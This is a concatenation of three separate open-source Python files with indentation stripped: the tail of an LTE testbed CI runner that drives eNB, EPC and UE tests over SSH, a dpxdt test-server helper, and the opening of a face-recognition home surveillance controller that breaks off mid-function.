matchReg = re.match('^\-\-eNB1IPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB1IPAddress = matchReg.group(1)
elif re.match('^\-\-eNB2IPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB2IPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB2IPAddress = matchReg.group(1)
elif re.match('^\-\-eNBUserName=(.+)$|^\-\-eNB[1-2]UserName=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBUserName = matchReg.group(1)
elif re.match('^\-\-eNB1UserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB1UserName=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB1UserName = matchReg.group(1)
elif re.match('^\-\-eNB2UserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB2UserName=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB2UserName = matchReg.group(1)
elif re.match('^\-\-eNBPassword=(.+)$|^\-\-eNB[1-2]Password=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBPassword = matchReg.group(1)
elif re.match('^\-\-eNB1Password=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB1Password=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB1Password = matchReg.group(1)
elif re.match('^\-\-eNB2Password=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB2Password=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB2Password = matchReg.group(1)
elif re.match('^\-\-eNBSourceCodePath=(.+)$|^\-\-eNB[1-2]SourceCodePath=(.+)$', myArgv, re.IGNORECASE):
if re.match('^\-\-eNBSourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNBSourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.eNBSourceCodePath = matchReg.group(1)
elif re.match('^\-\-eNB1SourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB1SourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB1SourceCodePath = matchReg.group(1)
elif re.match('^\-\-eNB2SourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-eNB2SourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.eNB2SourceCodePath = matchReg.group(1)
elif re.match('^\-\-EPCIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCIPAddress = matchReg.group(1)
elif re.match('^\-\-EPCBranch=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCBranch=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCBranch = matchReg.group(1)
elif re.match('^\-\-EPCUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCUserName = matchReg.group(1)
elif re.match('^\-\-EPCPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCPassword = matchReg.group(1)
elif re.match('^\-\-EPCSourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCSourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.EPCSourceCodePath = matchReg.group(1)
elif re.match('^\-\-EPCType=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-EPCType=(.+)$', myArgv, re.IGNORECASE)
if re.match('OAI', matchReg.group(1), re.IGNORECASE) or re.match('ltebox', matchReg.group(1), re.IGNORECASE) or re.match('OAI-Rel14-CUPS', matchReg.group(1), re.IGNORECASE):
SSH.EPCType = matchReg.group(1)
else:
sys.exit('Invalid EPC Type: ' + matchReg.group(1) + ' -- (should be OAI or ltebox or OAI-Rel14-CUPS)')
elif re.match('^\-\-ADBIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.ADBIPAddress = matchReg.group(1)
elif re.match('^\-\-ADBUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.ADBUserName = matchReg.group(1)
elif re.match('^\-\-ADBType=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBType=(.+)$', myArgv, re.IGNORECASE)
if re.match('centralized', matchReg.group(1), re.IGNORECASE) or re.match('distributed', matchReg.group(1), re.IGNORECASE):
if re.match('distributed', matchReg.group(1), re.IGNORECASE):
SSH.ADBCentralized = False
else:
SSH.ADBCentralized = True
else:
sys.exit('Invalid ADB Type: ' + matchReg.group(1) + ' -- (should be centralized or distributed)')
elif re.match('^\-\-ADBPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-ADBPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.ADBPassword = matchReg.group(1)
elif re.match('^\-\-XMLTestFile=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-XMLTestFile=(.+)$', myArgv, re.IGNORECASE)
SSH.testXMLfiles.append(matchReg.group(1))
SSH.nbTestXMLfiles += 1
elif re.match('^\-\-UEIPAddress=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-UEIPAddress=(.+)$', myArgv, re.IGNORECASE)
SSH.UEIPAddress = matchReg.group(1)
elif re.match('^\-\-UEUserName=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-UEUserName=(.+)$', myArgv, re.IGNORECASE)
SSH.UEUserName = matchReg.group(1)
elif re.match('^\-\-UEPassword=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-UEPassword=(.+)$', myArgv, re.IGNORECASE)
SSH.UEPassword = matchReg.group(1)
elif re.match('^\-\-UESourceCodePath=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-UESourceCodePath=(.+)$', myArgv, re.IGNORECASE)
SSH.UESourceCodePath = matchReg.group(1)
elif re.match('^\-\-finalStatus=(.+)$', myArgv, re.IGNORECASE):
matchReg = re.match('^\-\-finalStatus=(.+)$', myArgv, re.IGNORECASE)
finalStatus = matchReg.group(1)
if ((finalStatus == 'true') or (finalStatus == 'True')):
SSH.finalStatus = True
else:
Usage()
sys.exit('Invalid Parameter: ' + myArgv)
if re.match('^TerminateeNB$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.eNB_serverId = '0'
SSH.eNB_instance = '0'
SSH.eNBSourceCodePath = '/tmp/'
SSH.TerminateeNB()
elif re.match('^TerminateUE$', mode, re.IGNORECASE):
if (SSH.ADBIPAddress == '' or SSH.ADBUserName == '' or SSH.ADBPassword == ''):
Usage()
sys.exit('Insufficient Parameter')
signal.signal(signal.SIGUSR1, receive_signal)
SSH.TerminateUE()
elif re.match('^TerminateOAIUE$', mode, re.IGNORECASE):
if SSH.UEIPAddress == '' or SSH.UEUserName == '' or SSH.UEPassword == '':
Usage()
sys.exit('Insufficient Parameter')
signal.signal(signal.SIGUSR1, receive_signal)
SSH.TerminateOAIUE()
elif re.match('^TerminateHSS$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateHSS()
elif re.match('^TerminateMME$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateMME()
elif re.match('^TerminateSPGW$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.TerminateSPGW()
elif re.match('^LogCollectBuild$', mode, re.IGNORECASE):
if (SSH.eNBIPAddress == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '' or SSH.eNBSourceCodePath == '') and (SSH.UEIPAddress == '' or SSH.UEUserName == '' or SSH.UEPassword == '' or SSH.UESourceCodePath == ''):
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectBuild()
elif re.match('^LogCollecteNB$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '' or SSH.eNBSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollecteNB()
elif re.match('^LogCollectHSS$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectHSS()
elif re.match('^LogCollectMME$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectMME()
elif re.match('^LogCollectSPGW$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectSPGW()
elif re.match('^LogCollectPing$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectPing()
elif re.match('^LogCollectIperf$', mode, re.IGNORECASE):
if SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectIperf()
elif re.match('^LogCollectOAIUE$', mode, re.IGNORECASE):
if SSH.UEIPAddress == '' or SSH.UEUserName == '' or SSH.UEPassword == '' or SSH.UESourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
SSH.LogCollectOAIUE()
elif re.match('^InitiateHtml$', mode, re.IGNORECASE):
if (SSH.ADBIPAddress == '' or SSH.ADBUserName == '' or SSH.ADBPassword == ''):
Usage()
sys.exit('Insufficient Parameter')
count = 0
foundCount = 0
while (count < SSH.nbTestXMLfiles):
xml_test_file = cwd + "/" + SSH.testXMLfiles[count]
xml_test_file = sys.path[0] + "/" + SSH.testXMLfiles[count]
if (os.path.isfile(xml_test_file)):
xmlTree = ET.parse(xml_test_file)
xmlRoot = xmlTree.getroot()
SSH.htmlTabRefs.append(xmlRoot.findtext('htmlTabRef',default='test-tab-' + str(count)))
SSH.htmlTabNames.append(xmlRoot.findtext('htmlTabName',default='Test-' + str(count)))
SSH.htmlTabIcons.append(xmlRoot.findtext('htmlTabIcon',default='info-sign'))
foundCount += 1
count += 1
if foundCount != SSH.nbTestXMLfiles:
SSH.nbTestXMLfiles = foundCount
SSH.CreateHtmlHeader()
elif re.match('^FinalizeHtml$', mode, re.IGNORECASE):
SSH.CreateHtmlFooter(SSH.finalStatus)
elif re.match('^TesteNB$', mode, re.IGNORECASE) or re.match('^TestUE$', mode, re.IGNORECASE):
if re.match('^TesteNB$', mode, re.IGNORECASE):
if SSH.eNBIPAddress == '' or SSH.ranRepository == '' or SSH.ranBranch == '' or SSH.eNBUserName == '' or SSH.eNBPassword == '' or SSH.eNBSourceCodePath == '' or SSH.EPCIPAddress == '' or SSH.EPCUserName == '' or SSH.EPCPassword == '' or SSH.EPCType == '' or SSH.EPCSourceCodePath == '' or SSH.ADBIPAddress == '' or SSH.ADBUserName == '' or SSH.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
if (SSH.EPCIPAddress != '') and (SSH.EPCIPAddress != 'none'):
SSH.copyout(SSH.EPCIPAddress, SSH.EPCUserName, SSH.EPCPassword, cwd + "/tcp_iperf_stats.awk", "/tmp")
SSH.copyout(SSH.EPCIPAddress, SSH.EPCUserName, SSH.EPCPassword, cwd + "/active_net_interfaces.awk", "/tmp")
else:
if SSH.UEIPAddress == '' or SSH.ranRepository == '' or SSH.ranBranch == '' or SSH.UEUserName == '' or SSH.UEPassword == '' or SSH.UESourceCodePath == '':
Usage()
sys.exit('UE: Insufficient Parameter')
#read test_case_list.xml file
# if no parameters for XML file, use default value
if (SSH.nbTestXMLfiles != 1):
xml_test_file = cwd + "/test_case_list.xml"
else:
xml_test_file = cwd + "/" + SSH.testXMLfiles[0]
xmlTree = ET.parse(xml_test_file)
xmlRoot = xmlTree.getroot()
exclusion_tests=xmlRoot.findtext('TestCaseExclusionList',default='')
requested_tests=xmlRoot.findtext('TestCaseRequestedList',default='')
if (SSH.nbTestXMLfiles == 1):
SSH.htmlTabRefs.append(xmlRoot.findtext('htmlTabRef',default='test-tab-0'))
SSH.htmlTabNames.append(xmlRoot.findtext('htmlTabName',default='Test-0'))
repeatCount = xmlRoot.findtext('repeatCount',default='1')
SSH.repeatCounts.append(int(repeatCount))
all_tests=xmlRoot.findall('testCase')
exclusion_tests=exclusion_tests.split()
requested_tests=requested_tests.split()
#check that exclusion tests are well formatted
#(6 digits or less than 6 digits followed by +)
for test in exclusion_tests:
if (not re.match('^[0-9]{6}$', test) and
not re.match('^[0-9]{1,5}\+$', test)):
logging.debug('ERROR: exclusion test is invalidly formatted: ' + test)
sys.exit(1)
else:
logging.debug(test)
#check that requested tests are well formatted
#(6 digits or less than 6 digits followed by +)
#be verbose
for test in requested_tests:
if (re.match('^[0-9]{6}$', test) or
re.match('^[0-9]{1,5}\+$', test)):
logging.debug('INFO: test group/case requested: ' + test)
else:
logging.debug('ERROR: requested test is invalidly formatted: ' + test)
sys.exit(1)
if (SSH.EPCIPAddress != '') and (SSH.EPCIPAddress != 'none'):
SSH.CheckFlexranCtrlInstallation()
#get the list of tests to be done
todo_tests=[]
for test in requested_tests:
if (test_in_list(test, exclusion_tests)):
logging.debug('INFO: test will be skipped: ' + test)
else:
#logging.debug('INFO: test will be run: ' + test)
todo_tests.append(test)
signal.signal(signal.SIGUSR1, receive_signal)
SSH.CreateHtmlTabHeader()
cnt = 0
SSH.prematureExit = True
SSH.startTime = int(round(time.time() * 1000))
while cnt < SSH.repeatCounts[0] and SSH.prematureExit:
SSH.prematureExit = False
for test_case_id in todo_tests:
if SSH.prematureExit:
break
for test in all_tests:
if SSH.prematureExit:
break
id = test.get('id')
if test_case_id != id:
continue
SSH.testCase_id = id
SSH.desc = test.findtext('desc')
action = test.findtext('class')
if (CheckClassValidity(action, id) == False):
continue
SSH.ShowTestID()
GetParametersFromXML(action)
if action == 'Initialize_UE' or action == 'Attach_UE' or action == 'Detach_UE' or action == 'Ping' or action == 'Iperf' or action == 'Reboot_UE' or action == 'DataDisable_UE' or action == 'DataEnable_UE' or action == 'CheckStatusUE':
if (SSH.ADBIPAddress != 'none'):
terminate_ue_flag = False
SSH.GetAllUEDevices(terminate_ue_flag)
if action == 'Build_eNB':
SSH.BuildeNB()
elif action == 'WaitEndBuild_eNB':
SSH.WaitBuildeNBisFinished()
elif action == 'Initialize_eNB':
SSH.InitializeeNB()
elif action == 'Terminate_eNB':
SSH.TerminateeNB()
elif action == 'Initialize_UE':
SSH.InitializeUE()
elif action == 'Terminate_UE':
SSH.TerminateUE()
elif action == 'Attach_UE':
SSH.AttachUE()
elif action == 'Detach_UE':
SSH.DetachUE()
elif action == 'DataDisable_UE':
SSH.DataDisableUE()
elif action == 'DataEnable_UE':
SSH.DataEnableUE()
elif action == 'CheckStatusUE':
SSH.CheckStatusUE()
elif action == 'Build_OAI_UE':
SSH.BuildOAIUE()
elif action == 'Initialize_OAI_UE':
SSH.InitializeOAIUE()
elif action == 'Terminate_OAI_UE':
SSH.TerminateOAIUE()
elif action == 'Initialize_CatM_module':
SSH.InitializeCatM()
elif action == 'Terminate_CatM_module':
SSH.TerminateCatM()
elif action == 'Attach_CatM_module':
SSH.AttachCatM()
elif action == 'Detach_CatM_module':
SSH.TerminateCatM()
elif action == 'Ping_CatM_module':
SSH.PingCatM()
elif action == 'Ping':
SSH.Ping()
elif action == 'Iperf':
SSH.Iperf()
elif action == 'Reboot_UE':
SSH.RebootUE()
elif action == 'Initialize_HSS':
SSH.InitializeHSS()
elif action == 'Terminate_HSS':
SSH.TerminateHSS()
elif action == 'Initialize_MME':
SSH.InitializeMME()
elif action == 'Terminate_MME':
SSH.TerminateMME()
elif action == 'Initialize_SPGW':
SSH.InitializeSPGW()
elif action == 'Terminate_SPGW':
SSH.TerminateSPGW()
elif action == 'Initialize_FlexranCtrl':
SSH.InitializeFlexranCtrl()
elif action == 'Terminate_FlexranCtrl':
SSH.TerminateFlexranCtrl()
elif action == 'IdleSleep':
SSH.IdleSleep()
elif action == 'Perform_X2_Handover':
SSH.Perform_X2_Handover()
else:
sys.exit('Invalid action')
cnt += 1
if cnt == SSH.repeatCounts[0] and SSH.prematureExit:
logging.debug('Testsuite failed ' + str(cnt) + ' time(s)')
SSH.CreateHtmlTabFooter(False)
sys.exit('Failed Scenario')
else:
logging.info('Testsuite passed after ' + str(cnt) + ' time(s)')
SSH.CreateHtmlTabFooter(True)
else:
Usage()
sys.exit('Invalid mode')
sys.exit(0)
|
test_utils.py
|
#!/usr/bin/env python
# Copyright 2015 Brett Slatkin
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import socket
import tempfile
import threading
# Local libraries
import gflags
FLAGS = gflags.FLAGS
# Local modules
from dpxdt import server
from dpxdt.server import db
def get_free_port():
"""Returns a free port number to listen on for testing."""
sock = socket.socket()
sock.bind(('', 0))
return sock.getsockname()[1]
def start_server():
"""Starts the dpxdt server and returns its main thread."""
server_port = get_free_port()
FLAGS.fetch_frequency = 100
FLAGS.fetch_threads = 1
FLAGS.capture_timeout = 60
FLAGS.polltime = 1
FLAGS.queue_idle_poll_seconds = 1
FLAGS.queue_busy_poll_seconds = 1
FLAGS.queue_server_prefix = (
'http://localhost:%d/api/work_queue' % server_port)
FLAGS.release_server_prefix = 'http://localhost:%d/api' % server_port
db_path = tempfile.mktemp(suffix='.db')
logging.info('sqlite path used in tests: %s', db_path)
server.app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + db_path
db.drop_all()
db.create_all()
server.app.config['CSRF_ENABLED'] = False
server.app.config['IGNORE_AUTH'] = True
server.app.config['TESTING'] = True
run = lambda: server.app.run(debug=False, host='0.0.0.0', port=server_port)
server_thread = threading.Thread(target=run)
server_thread.setDaemon(True)
server_thread.start()
return server_thread
def debug_log_everything():
logging.getLogger().setLevel(logging.DEBUG)
for name in logging.Logger.manager.loggerDict.keys():
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
|
SurveillanceSystem.py
|
# Surveillance System Controller.
# Brandon Joffe
# 2016
# Copyright 2016, Brandon Joffe, All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Code used in this project included opensource software (Openface)
# developed by Brandon Amos
# Copyright 2015-2016 Carnegie Mellon University
import time
import argparse
import cv2
import os
import pickle
from operator import itemgetter
import numpy as np
import pandas as pd
from sklearn.pipeline import Pipeline
from sklearn.lda import LDA
from sklearn.preprocessing import LabelEncoder
from sklearn.svm import SVC
from sklearn.mixture import GMM
import dlib
import atexit
from subprocess import Popen, PIPE
import os.path
import sys
import logging
from logging.handlers import RotatingFileHandler
import threading
import time
from datetime import datetime, timedelta
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
from email.MIMEBase import MIMEBase
from email import encoders
import requests
import json
from openface.data import iterImgs
import Camera
import FaceRecogniser
import openface
import aligndlib
import ImageUtils
import random
import psutil
import math
# Get paths for models
# //////////////////////////////////////////////////////////////////////////////////////////////
fileDir = os.path.dirname(os.path.realpath(__file__))
luaDir = os.path.join(fileDir, '..', 'batch-represent')
modelDir = os.path.join(fileDir, '..', 'models')
dlibModelDir = os.path.join(modelDir, 'dlib')
openfaceModelDir = os.path.join(modelDir, 'openface')
parser = argparse.ArgumentParser()
parser.add_argument('--dlibFacePredictor',
type=str, help="Path to dlib's face predictor.",
default=os.path.join(dlibModelDir , "shape_predictor_68_face_landmarks.dat"))
parser.add_argument('--networkModel',
type=str, help="Path to Torch network model.",
default=os.path.join(openfaceModelDir, 'nn4.small2.v1.t7'))
parser.add_argument('--imgDim', type=int, help="Default image dimension.", default=96)
parser.add_argument('--cuda', action='store_true')
parser.add_argument('--unknown', type=bool, default=False, help='Try to predict unknown people')
args = parser.parse_args()
start = time.time()
np.set_printoptions(precision=2)
try:
os.makedirs('logs', exist_ok=True) # Python>3.2
except TypeError:
try:
os.makedirs('logs')
except OSError as exc: # Python >2.5
print "logging directory already exist"
logger = logging.getLogger()
formatter = logging.Formatter("(%(threadName)-10s) %(asctime)s - %(name)s - %(levelname)s - %(message)s")
handler = RotatingFileHandler("logs/surveillance.log", maxBytes=10000000, backupCount=10)
handler.setLevel(logging.INFO)
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.INFO)
#logging.basicConfig(level=logging.DEBUG,
# format='(%(threadName)-10s) %(message)s',
# )
class SurveillanceSystem(object):
""" The SurveillanceSystem object is the heart of this application.
It provides all the central proccessing and ties everything
together. It generates camera frame proccessing threads as
well as an alert monitoring thread. A camera frame proccessing
thread can process a camera using 5 different processing methods.
These methods aim to allow the user to adapt the system to their
needs and can be found in the process_frame() function. The alert
monitoring thread continually checks the system state and takes
action if a particular event occurs. """
def __init__(self):
self.recogniser = FaceRecogniser.FaceRecogniser()
self.trainingEvent = threading.Event() # Used to holt processing while training the classifier
self.trainingEvent.set()
self.drawing = True
self.alarmState = 'Disarmed' # Alarm states - Disarmed, Armed, Triggered
self.alarmTriggerd = False
self.alerts = [] # Holds all system alerts
self.cameras = [] # Holds all system cameras
self.camerasLock = threading.Lock() # Used to block concurrent access of cameras []
self.cameraProcessingThreads = []
self.peopleDB = []
self.confidenceThreshold = 20 # Used as a threshold to classify a person as unknown
# Initialization of alert processing thread
self.alertsLock = threading.Lock()
self.alertThread = threading.Thread(name='alerts_process_thread_',target=self.alert_engine,args=())
self.alertThread.daemon = False
self.alertThread.start()
# Used for testing purposes
###################################
self.testingResultsLock = threading.Lock()
self.detetectionsCount = 0
self.trueDetections = 0
self.counter = 0
####################################
self.get_face_database_names() # Gets people in database for web client
#//////////////////////////////////////////////////// Camera Examples ////////////////////////////////////////////////////
#self.cameras.append(Camera.IPCamera("testing/iphoneVideos/singleTest.m4v","detect_recognise_track",False)) # Video Example - uncomment and run code
# self.cameras.append(Camera.IPCamera("http://192.168.1.33/video.mjpg","detect_recognise_track",False))
# processing frame threads
for i, cam in enumerate(self.cameras):
thread = threading.Thread(name='frame_process_thread_' + str(i),target=self.process_frame,args=(cam,))
thread.daemon = False
self.cameraProcessingThreads.append(thread)
thread.start()
def add_camera(self, camera):
"""Adds new camera to the System and generates a
frame processing thread"""
self.cameras.append(camera)
thread = threading.Thread(name='frame_process_thread_' +
str(len(self.cameras)),
target=self.process_frame,
args=(self.cameras[-1],))
thread.daemon = False
self.cameraProcessingThreads.append(thread)
thread.start()
def remove_camera(self, camID):
"""remove a camera to the System and kill its processing thread"""
self.cameras.pop(camID)
self.cameraProcessingThreads.pop(camID)
self.captureThread.stop = False
def process_frame(self,camera):
"""This function performs all the frame proccessing.
It reads frames captured by the IPCamera instance,
resizes them, and performs 1 of 5 functions"""
logger.debug('Processing Frames')
state = 1
frame_count = 0;
FPScount = 0 # Used to calculate frame rate at which frames are being processed
FPSstart = time.time()
start = time.time()
stop = camera.captureThread.stop
while not stop:
frame_count +=1
logger.debug("Reading Frame")
frame = camera.read_frame()
if frame == None or np.array_equal(frame, camera.tempFrame): # Checks to see if the new frame is the same as the previous frame
continue
frame = ImageUtils.resize(frame)
height, width, channels = frame.shape
# Frame rate calculation
if FPScount == 6:
camera.processingFPS = 6/(time.time() - FPSstart)
FPSstart = time.time()
FPScount = 0
FPScount += 1
camera.tempFrame = frame
##################################################################################################################################################
#<###########################################################> MOTION DETECTION <################################################################>
##################################################################################################################################################
if camera.cameraFunction == "detect_motion":
camera.motion, mframe = camera.motionDetector.detect_movement(frame, get_rects = False)
camera.processing_frame = mframe
if camera.motion == False:
logger.debug('//// NO MOTION DETECTED /////')
continue
else:
logger.debug('/// MOTION DETECTED ///')
##################################################################################################################################################
#<#####################################################> FACE DETECTION AND RECOGNTIION <#########################################################>
##################################################################################################################################################
elif camera.cameraFunction == "detect_recognise":
# This approach peroforms basic face detection and
# recognition using OpenCV, Dlib and Openface
training_blocker = self.trainingEvent.wait()
frame = cv2.flip(frame, 1) # converts frame from BGR (OpenCV format) to RGB (Dlib format)
camera.faceBoxes = camera.faceDetector.detect_faces(frame,camera.dlibDetection)
if self.drawing == True:
frame = ImageUtils.draw_boxes(frame, camera.faceBoxes, camera.dlibDetection)
camera.processing_frame = frame
logger.info('//// FACES DETECTED: '+ str(len(camera.faceBoxes)) +' //')
for face_bb in camera.faceBoxes:
# Used to reduce false positives from opencv haar cascade detector.
# If face isn't detected using more rigorous paramters in the detectMultiscale() function read the next frame
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(long(x), long(y), long(x+w), long(y+h))
faceimg = ImageUtils.crop(frame, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
# returns a dictionary that contains name, confidence and representation and an alignedFace (numpy array)
predictions, alignedFace = self.recogniser.make_prediction(frame,face_bb)
with camera.peopleDictLock:
# If the person has already been detected and his new confidence is greater update persons details, otherwise create a new person
if camera.people.has_key(predictions['name']):
if camera.people[predictions['name']].confidence < predictions['confidence']:
camera.people[predictions['name']].confidence = predictions['confidence']
if camera.people[predictions['name']].confidence > self.confidenceThreshold:
camera.people[predictions['name']].identity = predictions['name']
camera.people[predictions['name']].set_thumbnail(alignedFace)
camera.people[predictions['name']].add_to_thumbnails(alignedFace)
camera.people[predictions['name']].set_time()
else:
if predictions['confidence'] > self.confidenceThreshold:
camera.people[predictions['name']] = Person(predictions['rep'],predictions['confidence'], alignedFace, predictions['name'])
else:
camera.people[predictions['name']] = Person(predictions['rep'],predictions['confidence'], alignedFace, "unknown")
camera.processing_frame = frame # Used for streaming proccesed frames to client and email alerts, but mainly used for testing purposes
##################################################################################################################################################
#<#####################################> MOTION DETECTION EVENT FOLLOWED BY FACE DETECTION AND RECOGNITION <#####################################>
##################################################################################################################################################
elif camera.cameraFunction == "motion_detect_recognise":
# When motion is detected, consecutive frames are proccessed for faces.
# If no faces are detected for longer than 30 seconds the thread goes back to
# looking for motion
training_blocker = self.trainingEvent.wait()
if state == 1: # If no faces have been found or there has been no movement
camera.motion, mframe = camera.motionDetector.detect_movement(frame, get_rects = False)
if camera.motion == True:
logger.debug('////////////////////// MOTION DETECTED //////////////////////')
state = 2
camera.processing_frame = mframe
else:
logger.debug('////////////////////// NO MOTION DETECTED //////////////////////')
continue
elif state == 2: # If motion has been detected
if frame_count == 0:
start = time.time()
frame_count += 1
frame = cv2.flip(frame, 1)
camera.faceBoxes = camera.faceDetector.detect_faces(frame,camera.dlibDetection)
if self.drawing == True:
frame = ImageUtils.draw_boxes(frame, camera.faceBoxes, camera.dlibDetection)
camera.processing_frame = frame
if len(camera.faceBoxes) == 0:
if (time.time() - start) > 30.0:
logger.info('// No faces found for ' + str(time.time() - start) + ' seconds - Going back to Motion Detection Mode')
state = 1
frame_count = 0;
else:
logger.info('//// FACES DETECTED: '+ str(len(camera.faceBoxes)) +' ////')
# frame = cv2.flip(frame, 1)
for face_bb in camera.faceBoxes:
if camera.dlibDetection == False:
x, y, w, h = face_bb
face_bb = dlib.rectangle(long(x), long(y), long(x+w), long(y+h))
faceimg = ImageUtils.crop(frame, face_bb, dlibRect = True)
if len(camera.faceDetector.detect_cascadeface_accurate(faceimg)) == 0:
continue
predictions, alignedFace = self.recogniser.make_prediction(frame,face_bb)
with camera.peopleDictLock:
if camera.people.has_key(predictions['name']):
if camera.people[predictions['name']].confidence < predictions['confidence']:
camera.people[predictions['name']].confidence = predictions['confidence']
if camera.people[predictions['name']].confidence > self.confidenceThreshold:
camera.people[predictions['name']].identity = predictions['name']
camera.people[predictions['name']].set_thumbnail(alignedFace)
camera.people[predictions['name']].add_to_thumbnails(alignedFace)
camera.people[predictions['name']].set_time()
else:
if predictions['confidence'] > self.confidenceThreshold:
